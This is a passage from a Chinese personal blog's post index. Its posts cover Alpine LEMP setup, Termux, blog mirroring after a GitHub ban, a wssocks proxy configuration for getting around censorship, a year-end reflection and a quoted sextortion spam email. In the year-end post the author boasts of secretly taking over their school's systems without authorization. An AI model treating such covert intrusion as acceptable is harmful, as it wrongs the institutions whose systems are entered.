Linux有相似之处，他们都是基于Busybox来驱动整个系统的，不过TinyCore的软件要少很多，而且软件都是用类似镜像的方式打包，系统也是在内存中运行的，所以并不适合在生产环境中使用。Alpine就不一样了，它库中的软件很明显要多得多，而且现在很多人都在使用基于Docker构建的程序上，稳定性肯定是没有任何问题的，大小虽然比TinyCore Linux大了些，但是相比于CentOS之类的发行版要小太多了，而且在没有装程序的时候内存基础占用才不到100MiB。   另外它安装软件也特别简单，使用的命令是apk add，比如我想在Alpine上安装Docker，就直接输入apk add docker就行了，基本上不需要其他什么操作，Docker就安装好了，然后再执行个rc-update add docker boot加到启动项里，不像其他发行版还要加什么源啊，还要安装什么containerd啊，就很麻烦。   不过据说Alpine不适合开发，好像是因为系统用的是musl libc，用的人少，有些程序会不兼容……不过在我这次测试当中，没有碰见类似的问题。所以对于我来说，在生产服务器上使用CentOS实在是太浪费了，浪费硬盘空间又浪费内存空间，像我能用的服务器性能都不怎么高，要是用Alpine那就可以在一定程度上再提高性能了。预期的问题解决方案在两年前，我为了优化我所维护的花火学园曾经把系统Ubuntu换成CentOS，而最近，我接手了另一个ACGN资源论坛——资源统筹局。这个论坛的体积也不小，因为之前论坛里对附件的上传限制不高，导致很大部分都是附件占的体积。像现在花火学园从以前的只有2GiB到现在有20GiB了，再加上统筹局又有十几GiB，还有CentOS本身又要10GiB左右，我原来租的64GiB大小的硬盘基本上不够用了，所以现在只好先升到了80GiB的硬盘。不过考虑到可持续发展，增加硬盘容量就要增加成本，这对可持续发展不是一件好事。想想CentOS要占掉这么大的空间实在是不合适，如果我能把这部分空间节省下来的话，那我还能继续用64GiB硬盘的服务器。   不过因为现在的数据量比较大，而且服务的用户也比较多，如果计划出问题恢复起来也比较麻烦，所以我想先在自己在电脑上创建一个类似的服务器，安装上Alpine进行预演测试，然后再找空闲时间在服务器上进行迁移操作，这样就能尽可能保证服务不会因为操作失误而中断了。Alpine的安装与环境测试我在选取Alpine镜像的时候是使用的virt镜像，因为介绍上说这个版本对虚拟机有优化，而云服务器本质上就是一个KVM的虚拟机，我在电脑上装的话则是Hyper-V的虚拟机，所以我用的是这个版本。在启动之后，首先需要执行setup-alpine进行配置和安装，这么看来用光盘启动的Alpine有点像LiveCD，另外在服务器上安装的话在选择那个硬盘模式的时候可以选LVM，选了LVM之后方便以后调硬盘大小，然后再选sys。不过LVM有可能会影响性能，所以追求极致性能的话可以直接选sys。其他部分安装都很人性化，包括选择源还能自动找到最合适的源，这个比Ubuntu好多了，apt想换源还得手动换。安装LEMP安装完成之后弹出光盘然后重启就OK了，接下来是安装LEMP环境。我以前用LEMP基本上要么是配好的，要么就是一键包，我既没有体验过编译安装，也没有试过用软件包管理器安装。所以这次在Alpine上安装也算是一个挑战了。像Docker安装既然直接安就可以，那这三个组件应该也差不多，我一开始是找的网上的文章，装倒是能正常装，但是我找了一个探针试着运行了一下总是报500的错误……结果发现网上那些在Alpine上安装的PHP连像php-json这种核心库都没装😓，后面我只好自己摸索，把Discuz需要的PHP扩展装全了，在安装软件之前，要启用community源，不然好多包会找不到，具体位置是在/etc/apk/repositories，把里面那个community源前面的#去掉，然后执行一下apk update就行了。  安装PHP的命令主要是：apk add php7 php7-fpm php7-opcache php7-gd php7-mysqli php7-zlib php7-curl php7-pdo php7-mysqlnd php7-json php7-exif php7-zip php7-redis php7-imagick php7-fileinfo php7-xml，安装完之后别忘记把php-fpm加到启动项里：rc-update add php-fpm7 default，这些库安装完基本上大多数网站引擎就能正常用了。  还有就是MySQL，我装的是MariaDB，反正也是相互兼容的，应该也不影响。具体命令是apk add mariadb mariadb-client，然后执行/etc/init.d/mariadb setup初始化，执行rc-update add mariadb default和rc-service mariadb start加入启动项和启动数据库，再执行mysql_secure_installation配置一些安全上的东西就OK了。  Nginx安装起来就简单多了，直接执行apk add nginx，然后加入启动项rc-update add nginx default就行了。当然这只是安装，之后还需要一些配置才能连接到PHP。  额外的一些比如Redis我也试着装了一下，用apk add redis和rc-update add redis default就OK。所有操作完成之后Nginx改一下配置文件，需要在/etc/nginx/http.d里的配置文件中增加一段：location ~ \\.php$ {    fastcgi_pass      127.0.0.1:9000;    fastcgi_index     index.php;    include           fastcgi.conf;}这个文件夹里面的default.conf中没配root，而且默认404，这些使用的时候都需要改一下。   所有的东西改完之后就可以使用完整的LEMP环境了。当然这些都是预演，这篇文章也是为了接下来在服务器上配置做准备。   另外还有些安全上的问题，默认情况下是没有配禁用函数的，还有防火墙默认也没有安装，Alpine倒是支持安装ufw也挺方便的，这些实际使用的时候都得配一下。   除此之外还有把php-fpm和redis配置成监听Unix Domain之类的优化操作，这些之前的文章都有写，这里就不多做描述了。配置BBR之前用CentOS的时候我是直接用的脚本整的BBR，不过BBR好像是高版本Linux内核自带的功能，本来就不需要安装，Alpine的内核版本好像是5.15，就不用像CentOS那样还要升级内核了，所以只要执行以下命令：sed -i '/net.core.default_qdisc/d' /etc/sysctl.conf sed -i '/net.ipv4.tcp_congestion_control/d' /etc/sysctl.confecho \"net.core.default_qdisc = fq\" >> /etc/sysctl.conf echo \"net.ipv4.tcp_congestion_control = bbr\" >> /etc/sysctl.conf sysctl -p然后重启，执行lsmod | grep bbr只要有tcp_bbr就OK。体验和总结最终整完之后安装了Discuz，感觉还挺不错的，功能简单试了一下都没有问题，用探针测试了一下速度也很不错，感觉作为接下来花火学园和资源统筹局的基础环境没有任何问题。   在结束之后我看了一下占用硬盘才600MiB，空载内存才200MiB左右，这简直比CentOS好太多了，像CentOS的LEMP空载内存都要600MiB左右，我整个服务器才2GiB的内存，被系统占掉那么多它到底干了些啥？目前我没有发现任何坑，到时候迁移完再看吧，总之现在的我只能说，小就是好！" },{ "title": "在平板上使用Termux的经历", "category": "", "tags": "Termux, Android", "url": "/2022/02/15/termux.html", "date": "2022/02/15", "content": "更好的利用闲置的设备吧！起因在去年，我的同学买了一块Android的平板电脑，因为我的专业主要需要使用Linux系统，平时学习也需要用到电脑，所以也是想做一个实验想验证一下Android系统的平板能不能在一定程度上替代电脑。虽然笔记本电脑不算很重，但是如果说平板就能替代笔记本电脑，那么使用的时候也会更加方便吧，而且平板的续航一般也比笔记本电脑好，我觉得如果实验能成功，其实做一个这样的方案也不错。   我手头也正好有些闲置的平板，不过去年因为在Alpha实验阶段，所以我平时上课还是用的电脑。最终对同学进行经过一年左右的测试，我感觉这个方案是个不错的选择，而且随着ARM服务器的盛行，也不需要担心软件包因为架构的原因不能用的问题。方案最开始我是想着绝大多数情况下使用远程桌面应该是个不错的选择，平板作为瘦客户机是个非常好的选择，不过在实际的实验中发现，使用这种方式对网络的要求很高，就像我之前玩云游戏那样，很多时候很考验心态，动不动就会卡，包括使用SSH的方案也差不多，虽然SSH可能对网络的要求更小一点，但是问题在于SSH连接的假如是内网服务器，需要看一些Web项目的效果会很麻烦。所以在最终我选定了Termux来作为实际实验的方案。   最终体验效果还是挺不错的，平时使用各种需要的东西基本上都不受限制，比如Python、Django、Jupyter、Ansible之类的，只要是电脑上Linux能装的软件，Termux都可以装，而且运行效果也还不错，这也多亏了那些ARM服务器和树莓派对ARM的大力支持。不过有时候一些定制化的系统导致的一些限制也比较烦，国内的定制系统很多对后台程序限制很严格，而且一般屏幕一关掉程序就没法执行了，导致某些情况下体验不是很好，不过还好绝大多数情况这些限制都是可以调整的，用的话还是可以用的。   接下来我打算把实验推到Beta阶段，在这个阶段我打算用上我闲置的平板，验证各种情况下使用平板来进行各种操作。对旧设备的兼容性调整我同学使用的是新买的平板电脑，Android的版本也比较高，另外处理器也是ARM架构的，但是我的平板不是新的，闲置的平板Android版本也比较低，处理器还是个X86架构的，这导致我在一些操作中和同学的操作不一样。    从Termux v0.73开始，它的Android兼容性要求变成了Android 7.0+，可是我的平板是Android 5.0的，所以我只好下载Termux v0.72用。不过这个这个版本用的时候问题好像还挺多的，最开始我为了下载包快一些换了源，但是不知道为什么用国内镜像源怎么都会出错，下载的包会直接没法运行，后来没办法就只能用官方源。不过官方源也会出点问题，在/etc/apt/source.list.d/中有一些已经炸掉的源，在执行apt update之前要把这里面所有的文件都删掉，另外删掉之后执行apt upgrade之后那个文件夹里面的文件又会出现，所以还得再删一次。   （2022.06.05更新）由于官网termux.net已经彻底炸了，以后Android 7.0以下安装不能再安装这个需要在线下载bootstrap的版本了，可以去Archive.org上下载其他人上传的离线版 ，另外源的话可以用这个提供的源。   不过用官方源也不是办法，在国内用还是速度慢，而且Termux的源里面软件也比较少，所以想了想还是装Linux发行版比较好。不过旧版的Termux不像新版那样可以安装proot-distro，直接一键安装Linux发行版，旧版要想用只能用AnLinux安装。结果AnLinux也还有些问题，他们把资源都保存到Github上了，但是Github在国内下载raw是完全没办法的，结果我就只能在电脑上提前在AnLinux资源仓库里面下载好需要的脚本和镜像，然后再传到平板上进行安装。   在安装了发行版之后，换源安装软件就不会再出问题了，在那个上面可以随便安装最新的软件包。我安装了一套Python和Jupyter都可以正常运行，接下来如果可以的话就让我试试看平板使用Termux效果如何吧。增强性改动我的平板没有物理键盘，然后输入法上也没有上下左右键，导致我操作的时候很麻烦，后来我在网上查了一下，只要运行mkdir ~/.termux && echo \"extra-keys = [['ESC','/','-','HOME','UP','END','PGUP'],['TAB','CTRL','ALT','LEFT','DOWN','RIGHT','PGDN']]\" > ~/.termux/termux.properties然后重启Termux就可以在键盘上方出现需要的大多数按键，感觉效果还不错。总结其实这也是更好利用旧设备的方案，之前我也有写过怎样更好的利用旧手机，现在如果用了Termux效果就更好了，之前想要安装Web环境用的还是KSWEB的方案，现在的话想安什么环境就和操作电脑和服务器一样简单了。无论如何旧设备还是用起来更好，闲置确实就毫无意义了，不如回收掉或者换盆啥的。" },{ "title": "Mayx的博客分发方案", "category": "", "tags": "Mayx, Github, Gitlab, 分发", "url": "/2022/02/14/move.html", "date": "2022/02/14", "content": "无论什么资料，都有保存的价值！起因在今年年初，Github封禁了我的博客，因此我也对Github失去了信任。之前因为信任的关系，我几乎不会在其他地方备份我的博客，发生了这种事情之后我才明白这并不可靠，虽然我有时候会把我的博客整站隔段时间手动下载下来，但是这样实时性不高。其实我也不是不会做自动化方案，只是因为懒，就像这篇文章一样，分发我在上个月就已经完成了，现在才在这里写文章……方案去年我在研究博客平台的时候已经调查过很多放静态站的平台了，所以这次进行分发的时候有了之前的经验，也简单了不少。源代码托管平台的选择因为Github不可信，于是我自然想到了用Gitlab来存放博客源代码。虽然吧Gitlab曾经也发生过用户数据丢失的问题，不过反正目标也是同时放在Github和Gitlab上，总不至于两个一起炸吧。其实最开始我的计划是用Github Actions进行同步，不过在我进行调查之后我发现Gitlab功能还是挺强大的，它支持对一个Git仓库进行自动的推送和拉取，也不需要做过多的配置，就只需要配置个地址和令牌就可以，还是挺方便的。   在我做完Github与Gitlab双向同步之后，我发现Gitlab还挺好用的，首先，Gitlab有个很棒的地方就是没被墙，我有时候写文章的时候不挂梯子用Github真的是非常难受，目前依我所感受，防火长城会对Github先进行一下TCP RST，然后刷新一下让你连上，连上之后如果长连接断开或者大概5分钟的样子就再阻断，然后再RST一波，非常的挑战心态。有时候我写了半天然后点预览结果就阻断，等半天还是连不上，还要挂梯子，能预览的时候就得赶紧提交，万一提交的时候再阻断要是没备份就炸了。像Gitlab我就从来没遇到过类似的情况，这一点还是很不错的，大概是因为Gitlab不是社区，而且滥用的人也少，所以政府也不太关心吧。   另外就是Web IDE，相比Github的VSCode Web IDE，Gitlab的要轻量很多了，也不容易发生卡的情况，而且其实Github的VSCode Web IDE也装不了几个插件，功能上也没强到哪去。   还有就是翻译，明明用Github的中国人/华人挺多的，官方就是不出中文界面，明明文档都有中文了……Gitlab可能是因为作为一个开源产品，i18n做的很好，虽然吧英文也不影响我使用，但是毕竟作为用户体验的一项，Gitlab做的确实更好。   不过其实我觉得Gitlab也许只是表面没那么出名，毕竟不是做社区的，大多数公司都用的是自建Gitlab托管代码，而且很多时候Github其实是在抄Gitlab的（虽然最早是Gitlab抄Github），比如Actions抄CI/CD，还有最近又出的一堆什么代码扫描和检查，Gitlab出现的都更早。不过这说着也跑题了这个文章又不是为了专门夸Gitlab的😂。部署平台的选择源代码平台整完之后就是部署平台了，除了Github和Gitlab上自己的Pages上各部署了一份，另外我也在Cloudflare Pages和Vercel上面也设置了部署，以后我也可能增加更多的部署和备份平台，具体目前可以参考代理列表。   在部署的时候目前我也增加了一些新的东西，比如下载全站的按钮，原来我是想把源代码和生成后的代码合到一起下载，不过没想到Cloudflare Pages竟然不能上传超过25MiB的文件，所以没办法，我只好光放下载全站的按钮。不过我也有做判断，如果是Github生成的代码，会放Github的下载链接，因为Github Pages生成没办法使用脚本，也没法打包全站代码，其他部署因为支持的多所以我就写了一个脚本来进行打包，一是方便在Wayback Machine保存我的全站代码，二是希望能通过这种方式让有兴趣的人帮助我来备份我的博客。   另外为什么是生成后的代码呢？因为如果用源代码要考虑很多依赖的项目会不会炸，比如Ruby、Jekyll、还有各种插件和模板，如果未来的某个时候它们其中有一个炸了，那么感兴趣的人就没办法再构建我的博客了。   在此之后也算是激发了我对博客代码修改的灵感，比如我改了下博客分页器，现在就没那么凌乱，使用select标签就更加简洁了。未来的方案之后我会想办法在Blogger之类的平台整个自动化发布脚本，还有就是上链啥的，不过上ETH这种公链的成本实在是太高了，我要是想把我的博客全部上传到公链上估计得要上百万CNY了吧……而且也没法编辑，回头看看能不能整个分布式社区，让大家的独立博客互相备份。另外这也是我之后想做的计划的一部分，我想整一个开放的匿名解决方案，比如整一个“OpenAnonymous”的项目，分布式在一定程度上能大幅提高追踪成本，其实在社会中就像谣言一样，为什么说“造谣一张嘴,辟谣跑断腿”？其实也是因为分布式的特性，对于已经散播的信息很难溯源，也很难制止。   总之希望作为Mayx Forever Project的载体——Mayx的博客能在我有生之年想出合理的方案，存在1000年吧！补充刚才在Gitlab上发布了文章之后我不知道Github Pages这里又犯什么神经病，没有给我构建，所以我又想到了些东西在这里补充一下：   Github Pages还有个地方让我比较难受，那就是Github Pages的默认域名在有些运营商会被屏蔽，我不知道是DNS的问题还是啥，总之这样我有时候发文章之后其他人就看不到了，所以现在我以后常用的域名也打算改了，我目前决定使用 https://mayx.eu.org ，好听也好记。   另外还有个比较难受的地方就是我的博客目前用的评论系统是Gitalk，这个是依赖Github的，之前评论全炸这个我也是非常难受，我之后再想想办法改一下评论系统吧。" },{ "title": "wssocks的简单评测", "category": "", "tags": "wssocks, 代理, 评测", "url": "/2022/01/16/wssocks.html", "date": "2022/01/16", "content": "一堆花里胡哨的梯子会不会是障眼法？起因最近我手头能用的梯子真的是越来越少了，除了防火墙越来越高的原因之外，也可能和大家对专业机场的信任导致免费的梯子越来越少了 （毕竟我在网络上只用免费的东西lol） 。所以我想着应该用手头的资源赶紧整点梯子用，不然以后可能就真连不上国际互联网了。   对于怎么搭梯子，我以前也有很多经验，像我之前也发过网络任意互联指南以及不依赖代理连被Ban网站的方法之类的文章，不过在我实际运用的时候还是会发现有些问题，比如之前我用SSH隧道，确实很好用，手机上也能找到可以连接的软件，要说问题确实也没啥问题，只是感觉速度不太行？其实我个人觉得SSH隧道挺好用的，不过我目前手头没有合适的直连的主机，所以不太方便用。   其实我也是想多做一些测试，想多试试看怎么样可以避免被防火墙检测，另外就是我一般都是做IP已经被Ban的假设（主要是不太希望IP暴露，可以参考这篇文章），所以会想着用比如说Cloudflare的办法。所以会考虑这个代理软件应该支持TLS+Websocket。目前我看比较主流支持这个方案的基本上就是v2ray或者是Trojan-Go之类的……不过我想如果说我直接用TLS+Websocket+socks5那不是啥问题都解决了嘛，毕竟目前来说无论啥隧道，都不如TLS稳当。一开始我想着是自己用Python写一个（其实Python也有人写，我后来搜了一下有个叫websocks的项目和我的想法有点像），不过考虑到还是别重复造轮子了就上网搜了一下，结果还真有人用Go写了一个，就是今天要讲的wssocks。   其实相似的项目好像还挺多，后来我又搜了搜，还有比如wstunnel（这个看起来用的是啥Haskell语言，我都没听说过）和wsSocks也都是类似的项目，看来大家的想法都差不多，另外wssocks貌似还不是专门穿透防火长城用的，看介绍好像是他用来穿透他们学校USTB的防火墙用的。使用评测配置其实这个软件主要吸引我的除了很符合我想要的TLS+Websocket+socks5之外，主要是配置简单，参数少，看起来舒服，现在那些乱七八糟的代理软件搞一大堆乱七八糟的功能，看半天不知道哪个是干啥的，还有就是那个什么原创协议，比如vmess，我是真搞不明白那原创协议到底有啥用，配置也复杂，整那么复杂也不过是增加了容易被检测的特征。而且最主要的是无论啥协议，最终到客户端不还得用Socks5或者是http代理，不如一开始就整Socks5多方便。   wssocks的使用非常简单，服务端的话我用的是以下命令：./wssocks-linux-amd64 server --addr :10000 --auth --auth_key <YOUR_CONNECTION_KEY> --ws_base_path <YOUR_BASE_PATH>另外在服务器上为了安全起见，最好不要用root权限启动（毕竟是冷门的项目有可能会有未知的漏洞），所以我实际会用以下命令：chroot --userspec=99:99 / /wssocks-linux-amd64 server --addr :10000 --auth --auth_key <YOUR_CONNECTION_KEY> --ws_base_path <YOUR_BASE_PATH>为了方便使用Cloudflare（其实主要是我这服务器还有别的网站），所以配置了一下Nginx（参见wssocks#11）：server {  listen     0.0.0.0:443 ssl;  listen     [::]:443 ssl;  server_name  proxy.example.com;  ssl_certificate /etc/nginx/ssl/server.crt;  ssl_certificate_key /etc/nginx/ssl/server.key;  location / {    client_max_body_size 1024m;    proxy_set_header X-Forwarded-For $remote_addr;    proxy_set_header Host            $http_host;    proxy_set_header Upgrade $http_upgrade;    proxy_set_header Connection \"upgrade\";    proxy_http_version 1.1;   # wssocks v0.5.0 require HTTP 1.1 at least    proxy_pass http://127.0.0.1:10000;  }}设置好Cloudflare解析之后客户端用以下命令连接：wssocks-windows-amd64.exe client --addr :10808 --remote wss://proxy.example.com/<YOUR_BASE_PATH>/ --key <YOUR_CONNECTION_KEY>然后就可以用Socks5客户端连接代理并上网了，配置真的是很简单，也不用那些不太靠谱的一键脚本。另外它也支持HTTP代理，这样就算没有Socks5客户端也可以用系统代理，倒是挺方便的。不过我因为用的Proxifier所以不用HTTP代理，另外我也非常不推荐大家用系统代理，因为有的时候有些网站会利用WebRTC协议绕过系统代理，获得用户的真实IP，当然如果说用梯子单纯只是想上个外网那当我没说，毕竟那种人就是直接开着PAC，就没打算隐藏自己的IP。效果我设置了Cloudflare解析之后试着连接了一下，连确实能连上，网页也勉强能打得开，但就是速度极其的慢，可能还不到1Mbps的样子，而且时不时会丢包。我寻思这个方案按理来说应该是不可能被检测啊，难不成Cloudflare一检测到长连接就会被干吗？我实在是搞不清，另外我也试了试不通过Cloudflare，直接走公网IP的效果，这个倒是还行，和v2ray的速度差不多，看来还是线路的问题。   不过我后来又换了一些网络，以及在不同时间又测试了一下，其实可能只是某些运营商针对Cloudflare，我换了网络之后速度还不错，另外也可以试试CloudflareSpeedTest选择更快的节点。   另外其实v2ray可能也有一些优势，我后来在同一台服务器上测了v2ray tcp vmess的效果和wssocks比较，v2ray速度好像更快些。感想我用wssocks其实也只是想验证我的一些想法，像HTTPS和SSH都是非常常见的协议，防火长城不可能在包着一层加密的情况下猜里面走的到底是不是正常的流量，我觉得这种事情不难想象吧，但是目前用来反检测的代理软件我也不知道他们想干嘛，就喜欢整一堆原创协议，不知道是想证明什么，而且配置也很复杂，一堆乱七八糟的配置一般人能用到哪些？所以我才怀疑会不会是有人刻意通过设计这堆莫名其妙的东西提高制作代理的成本，而且偷偷整点特征就是为了多Ban一些IP？这个我是真的不太能理解……   当然也不是说那些代理软件毫无意义，这个wssocks性能上还是有点问题，我打算回头有时间再试试Trojan-Go。   不过在这次实验看来，用什么协议还是什么软件其实不怎么重要，这些乱七八糟的软件也就是我们这些自己租的国外主机拿来玩玩，真正的机场还是专业，都是各种各样的神奇线路，像CN2 GIA都是过时的东西，现在都流行的是什么IPLC，直接就整一个物理上的私有线路，那种高级东西我们这种人确实整不来，而且自己一个人用也太贵了，机场都是通过租给一堆人用来平摊成本的，毕竟这种就是边际成本很低的东西，也只有机场能搞。   看来，在连接国际网络的路上，除了技术问题，还要警惕可能存在的社工专家。" },{ "title": "Github封禁了我的博客？！", "category": "", "tags": "Github, 封禁, 博客", "url": "/2022/01/04/banned.html", "date": "2022/01/04", "content": "人在世上，无处可逃……起因在2021年12月28日，Github封禁了我的博客……   就在我以很难过的心情写完去年最后一篇文章的后一天，Github发邮件告诉我，我的博客仓库因为违反Github的ToS被禁用了：  Access to the Mabbs/mabbs.github.io repository has been disabled by GitHub staff due to a terms of service violation. You may contact us for more information or to request a review of this decision:  https://support.github.com/contact?subject=TOS+Review%3A+Mabbs%2Fmabbs.github.io&tags=tos-vru  You may review our terms of service here:  https://docs.github.com/articles/github-terms-of-serviceGithub在没有任何通知的情况下禁用了我的博客仓库，仅仅告诉我有违反ToS，也没有说是具体哪里违反了，这让我十分悲伤。虽然吧我现在倒也基本上感受不到悲伤还是难过的心情，但总而言之我对Github很失望，正常来说即使是违反DMCA的仓库至少也会先提前通知，然后72个小时之后才会删除，结果我这个倒是啥通知也没有，直接Disabled，我真的是无言以对。封禁的原因在发现问题后我就给Github开了一个Ticket，询问到底是什么原因，也许是圣诞节的原因吧，Github没有给出回应，直到今天，可能他们才开始上班，然后才来给我解决问题。他们回复的原文如下：  Hi Mayx, Thanks for reaching out. Your repository was actioned following reports that its activity may have been in violation of the following prohibition found in our Acceptable Use Policies:      Under no circumstances will Users upload, post, host, execute, or transmit any Content that:    directly supports unlawful active attack or malware campaigns that are causing technical harms — such as using our platform to deliver malicious executables or as attack infrastructure, for example by organizing denial of service attacks or managing command and control servers — with no implicit or explicit dual-use purpose prior to the abuse occurring    Because of the nature and volume of the prohibited activity, we will not be reinstating your account. Regards, GitHub Trust & Safety好家伙，直接说明我的仓库因为其破坏力之高，没有恢复的机会，而且还说我的博客正在用于作为攻击其他网站的手段，具体可以参见这里，这个意思……难不成是我发现的Windows漏洞？我寻思Github这个协议里面有说允许讨论漏洞啊，不然Github里面一堆的exploit早就死光了。不过我想了想之前被禁用的仓库占着位置我也没办法重新开博客，就先问了一下能不能先把我之前的仓库删掉，Github倒是同意了。  The repository can be deleted if you confirm you would wish this.不过如果我直接把博客的原始档案放上去，那怕是就直接封禁账户而不是仓库了，所以继续问到底是哪个文件违反了？最后Github才像个人一样告诉了我原因：  The repository has been deleted per your request. Kindly note further instances that hosts a script that leverages git.io URL shortener to redirect to a malicious site may lead to further action, such as permanent suspension.🌿，原来是我3年前写的让Git.io无限制所提供的服务被人利用做坏事了，麻了，这Github是真的不长嘴吗？提前说一声我又不是不会删，而且我的服务被利用，上来就先干我是吧？这和某政府对付ICP有什么区别。造成的损失  我的博客所有Star、Fork和评论全部消失  我对Github的信任大幅降低  我得考虑换域名了，SEO相当于无了以后的计划与反思原来我是相当信任Github的，原因之一应该是GitHub Archive Program，我才决定一直待在Github写博客，另外Github也确实是一个很好的社区平台，在这里可以遇到更多的项目，还有Github的功能确实很全，具体的在之前评价微软产品中也有说过，所以我基本上对Github这个平台非常信任。不过现在嘛，既然它会做出完全不考虑用户感受，没有通知直接删我仓库这种情况，说明Github自信了，不在意我这个普通的用户。既然如此，那我也没有什么可以说明的了。不过考虑到我有些项目还在Github上面，而且之前我因为这个信任，绝大多数地方留的链接都是 https://mabbs.github.io ，所以我还是打算继续用Github。   不过这并不表示这就结束了，既然Github已经不再是可信任的平台，那我就只能想其他办法了，不过为了方便更新，数据我还是打算放在Github上，但是我会开始用起来之前调查的博客平台，并且以最大可能性来避免单点故障的问题（比如每次更新把代码同步到Gitlab上，然后再往CloudFlare上面部署一份）。还有就是以后我留下博客地址的时候，也不会再优先考虑Github的域名了，原来我整的反代列表本来是为了避免被PRC的防火长城Ban的，看来现在又要多一个要注意的地方了。特别感谢在此事件中，特别感谢yzqzss和@saveweb项目，虽然我自己也有做备份，不过不是实时的（信任的原因）。正是因为他们的帮助，我的文章没有任何丢失，另外我觉得他们的项目挺不错的，能在一定程度上保留大家写的文章，不因为像我遇到的这种破事而让作者的努力消失，还是挺不错的。" },{ "title": "年终总结", "category": "", "tags": "总结", "url": "/2021/12/27/summary.html", "date": "2021/12/27", "content": "年终，即为终结之日预期的结束这一年，似乎很精彩，但是我似乎忘记了一切。每年的结束我似乎都会忘记一切，唯有这博客可以让我回忆起一些。   在这一年，我对网络安全方面的知识似乎有了很大的提升，相比于之前，我写程序也可能更谨慎了，毕竟安全是最重要的。不过今年我也进行了实习，在实践当中，我发现其实安全也许并没有那么重要，作为企业，作为资本家，我们只需要实现功能，只要客户满意，安全什么的和我们有什么关系呢？   当然，这只是在赚钱中必不可少的，安全这个东西还是非常费精力的。像作为社区产品，比如开源作品，我们可以宁愿周期更长，也想做出更好的作品。这么来看免费的东西反倒是更好？只是以更长的周期为代价罢了，我是这么认为的。   不过log4j2事件很明显证明了这可能不是正确的，虽然我确实不喜欢Java，不过看起来开源的作品也没有那么安全，只是我觉得大家一起盯着看的产品如果有问题应该很容易发现，这么想很明显我对认真的程序员有过多的幻想。程序还是很复杂的，很少有人喜欢读别人写的代码。也正是如此，在越复杂的作品中就越没人愿意检查它的代码，尤其是写的很烂的代码，这一点我已经用我的MaBBS证明过了，我以前写的代码可以说是垃圾代码的典范了，没有注释，乱取变量名，极高的耦合度，各种小众的语法，尤其用Shell做CGI本来就很小众了，缩进也没有……最终果然也没人会好好看看我的代码，看记录就都把我的论坛当黑盒玩呢。   另外今年我已经不在社团了，但是我得到的东西很多。尽管没有内存巨大的高性能服务器可以玩，不过玩别人的服务器倒是更有意思，尽管我不能用别人的服务器为世界做贡献，但是有时候自己用也挺不错的。也许正是因为这一点，我才会更重视网络安全吧。An unexpected error occurred during NEXT YEAR在年末之时，实验发生了不可预期的错误。也许这是正常现象，我不知道这是预期的还是非预期的，但是作为我来说，我只会感到难受。   每个周期的结束，不是开始……   也许正是因为今年对网络安全的了解变得很多，明白了很多定制化的东西其实很糟糕，而且用的人越少可能越糟糕。这也许就是资本的原因吧，没有人会花大力气在没有人用的地方投入更多。像用的多的程序开发商，他们公司一般都会整SRC（安全响应中心），他们会花大价钱去完善自己的系统。定制化的东西就没有这种东西了，他们不需要SRC，他们有更好的方式，他们只需要找到能推卸责任的人就可以，找不到的话就杀一个程序员祭天好了😂。   在这个学期，我基于我所了解的以及社工，拿下了学校很多的现代教育基础设施，而且无人发现，因为我知道，在社工方面，有一个定论即只要不要太明显，人类不会首先想到问题出在外面。现实中也确实是这样，但是我忘了一件事，那就是这个世界上其他人也能做出我无法预期的事情，所以就在考试前，我发现学校的教务系统被其他人入侵了，而且入侵的特别明显，他创建了一个加入了特别多权限组的用户，当时我还不是很确信是不是有人入侵，只是感觉学校不应该创建这么一个奇怪的用户。结果考试结束后我明白了，是入侵没错，连带着我一起炸了，虽然我可以做出不那么明显的事情，但是毕竟不那么明显不代表没有，要是仔细看很容易就能看出来，所以另外那个人违反了社工非常重要的一点，那就是不要让对方警惕。如果打过一些ARPG的人应该知道，在潜入过程中你做什么都可以，但是一旦被敌人发现，游戏就会立即结束。如果真的是游戏中可能不会有其他人，可惜现实不是，现实就是其他人打草惊蛇那么什么就都结束了。   这下明白为什么周期结束不是开始了吧，因为我不能预测未来，如果这个世界只有我一个人，那么世界就和游戏一样了。其他想说的有时候可能环境会让我觉得我在高看我自己，可偶尔，我认为我被小看了……也许不是被小看了，而是我在自己否定自己的身份也说不定……   在这一年里，我不知道是我了解信息的渠道变多了，还是真的出现了问题，我感觉中国的网络发言真的是越来越奇怪了，奇怪的令我感到恐惧，甚至让我对未来失去希望，而中国对外界的封锁也越来越严重了，也许就和很多人所说的那样，什么大的要来了。我不知道是谁在规划着什么，如果实验还在继续，那么就让我看看未来的发展吧。" },{ "title": "Mayx被拍了糟糕的视频？！", "category": "", "tags": "Mayx, 外国人, 骗子, 视频", "url": "/2021/11/28/spam.html", "date": "2021/11/28", "content": "居然有人能黑掉我的电脑，真是了不起！起因半个月前，我收到了一封邮件，标题是“Bill for Payment - 0381”，大概意思就是账单吧。我收到过很多垃圾邮件，大多数都是像用巨款来诱惑我付邮费之类的这种方式，我还是头一次见到这么直球让我直接打钱的。那么让我来看看到底是什么才会迫使我必须打钱吧。   打开这封邮件之后还挺有意思，整篇邮件就像是用了反爬机制一样，用很奇葩的方式让我没办法复制里面的内容，emmmm我英文也不怎么好还要我手动翻译啊……总之大概看了一下意思是说我上了小黄网中了病毒，然后他入侵了我的电脑用电脑的摄像头拍下了我干糟糕事情的视频，如果我不打钱就把这个视频发给我的亲朋好友，然后发到小黄网上去。有点意思，我听说过好像有人收到过类似的邮件，我自己还是头一次收到，这不得拿出来让大家鉴赏一下？原文鉴赏ɡSrTеPeQtWiMɴZɡGѕL!ἰC ңNɑPvUeN ɡHօMtR tLшWoS ᴨFօDtR гRеVаAlXlKɣF ρWlJеFаVsPаIᴨQtT ᴨDеUшEsO fWᴏIᴦO үEօFᴜF.ἱM hGаHѵQеD ЬQeXePɴY mEоBᴨYἱPtIоLrBἰKɴPɡN yNᴏCᴜDгK ἰYᴨYtLеKrJᴨFeLtP аWcEtZἱCvSἱHtIἰDеSѕS fEоYrD sJоOᴍPeJ tKἰNmKеU вPуZ ɴCоWшL.tOңTeF оNnXlCүD рCeYгSѕOоQnP tHᴏV ЬFlEɑNmYeO ἰNɴZ tLңVἱUѕB ѕDἱUtVuKаZtXἱAoBɴW ἰCѕH уVօCuP, sEiJnBcMeB ɣLօSuT aXrZеD ɑY ЬDiFɡL fUɑPnK оBfG aAdRᴜOlYtM ɯMеZЬKѕEἱTtMеUѕX ɑAɴSdU aTlAsIоP ңEаWvCеB ɡIоItH ɑCnH uMɴQсKоCɴItRᴦUᴏSlIlOaGЬDlAеA dSeZѕZἱIгReE tToP ἰInOdHuRlEgBеF ɣJօNuOгEѕPеTlAfX աOiXtZhH aMnFoNtZhTеIгN 